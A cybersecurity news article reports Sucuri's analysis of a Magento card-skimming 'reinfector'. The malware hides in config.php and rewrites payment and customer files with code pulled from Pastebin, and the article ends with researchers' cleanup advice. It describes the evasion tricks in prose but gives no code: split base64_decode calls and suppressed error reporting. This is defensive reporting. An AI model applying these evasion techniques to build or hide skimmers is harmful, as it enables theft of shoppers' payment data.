Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Magento credit card stealer Reinfector allows reinfect sites with malicious code

Cybercriminals used the ‘credit card stealer reinfector’ to reinfect the websites and continue to steal personal and financial data. Researchers at Sucuri reported crooks are using a very simple evasion technique to reinfect Magento websites after their malicious code has been removed. Cybercriminals have devised a method to hide the malicious code, the ‘credit card stealer reinfector’, used to […]

Magento 2.3.4

Cybercriminals used the ‘credit card stealer reinfector’ to reinfect the websites and continue to steal personal and financial data.

Researchers at Sucuri reported crooks are using a very simple evasion technique to reinfect Magento websites after their malicious code has been removed.

Cybercriminals have devised a method to hide the malicious code, the ‘credit card stealer reinfector’, used to reinfect the websites and continue to steal personal and financial data.

The credit card stealer reinfector is hidden inside the default configuration file (config.php) of Magento installs, it is included on the main index.php and is loaded with every page visited by the users, this process ensures that the code is re-injected into multiple files of the website.

Researchers highlighted that the config.php file is automatically configured during the installation of the Magento instance and usually administrators or website owners don’t change it.

“This code is a prime candidate for infections once it is included right on the main index.php, loading at every page.” reads the analysis published by the experts.

“On the first block, we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content into specific files related to the payment process or user control:

/app/code/core/Mage/Payment/Model/Method/Cc.php
/app/code/core/Mage/Payment/Model/Method/Abstract.php
/app/code/core/Mage/Customer/controllers/AccountController.php
/app/code/core/Mage/Customer/controllers/AddressController.php
/app/code/core/Mage/Admin/Model/Session.php
/app/code/core/Mage/Admin/Model/Config.php
/app/code/core/Mage/Checkout/Model/Type/Onepage.php
/app/code/core/Mage/Checkout/Model/Type/Abstract.php

The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it”

The malicious code was stored on Pastebin, this choice allows attackers to remain under the radars.

Experts pointed out that the reinfector code they analyzed is able to bypass security scanners.

“The mechanism the attackers add “error_reporting(0);”is very interesting. It avoids any error leading to the discovery of the infection.” states the post.

credit card stealer Reinfector

The patch() function is used to inject the malicious code for stealing confidential information into Magento files, it uses 4 arguments (The path of a folder, the name of a file stored in that path needs to be infected, file size that is used to check if it is necessary to reinfect the given file, a new file name to be created, and the remote URL from which the malicious code will be downloaded.

Experts noticed that the base64_decode() function is split in multiple parts to evade detection from security scanners.

“As a rule of thumb, on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified quickly. We advise you to do it first thing. Many times, removing just the infection that you have a main concern about is not enough. You should always assume someone is out there ready to catch you off guard.” conclude the researchers.

“For Magento infections like this one, you can use our step-by-step guide on how to identify a hack and clean a compromised Magento site.”

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – credit card stealer reinfector, Magento)

[adrotate banner=”5″]

[adrotate banner=”13″]